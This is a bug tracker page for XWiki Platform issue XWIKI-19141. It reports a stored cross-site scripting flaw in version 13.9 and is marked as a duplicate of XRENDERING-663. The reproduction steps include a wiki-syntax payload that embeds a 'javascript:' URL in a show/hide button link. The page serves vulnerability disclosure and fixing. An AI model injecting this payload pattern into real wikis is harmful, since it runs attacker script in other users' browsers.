Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-19141

stored XSS on XWiki

    XMLWordPrintable

Details

    • Bug
    • Resolution: Duplicate
    • Critical
    • None
    • 13.9
    • None
    • Unknown
    • N/A
    • N/A

    Description

      Anyone with write access to a XWiki page can introduce a stored XSS to the page. For more details about the impact: https://cwe.mitre.org/data/definitions/79.html

      Reproduction:
      a) create a wiki page
      b) edit source and write: 

      (((
(% class="showhidebutton" %)
(((
[[Show Example>>path:javascript:prompt("xss on", window.location.hostname)||aria-controls="showhidecontentcontainerinstance-1" data-hide-message="Collapse" data-show-duration="200" data-show-effect="toggle" data-show-message="Show Example" id="showhidebuttontextinstance-1" role="button" style="cursor:pointer"]]
)))

(% id="showhidecontentinstance-1" style="display: none;" class="showhidecontent" %)
(((
(% aria-expanded="false" id="showhidecontentcontainerinstance-1" role="region" tabindex="-1" class="contentcontainer" %)
(((
(% class="box" %)
(((
(% class="code" %)
(((

      c) save and click on show example
       

      Attachments

        Issue Links

          duplicates

          Bug - A problem which impairs or prevents the functions of the product. XRENDERING-663 XSS Javascript injection via XWiki 2.x syntax

          • Blocker - Blocks development and/or testing work, production could not run.
          • Closed

          Activity

            People

              surli Simon Urli
              sparrow Chenming Xu
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: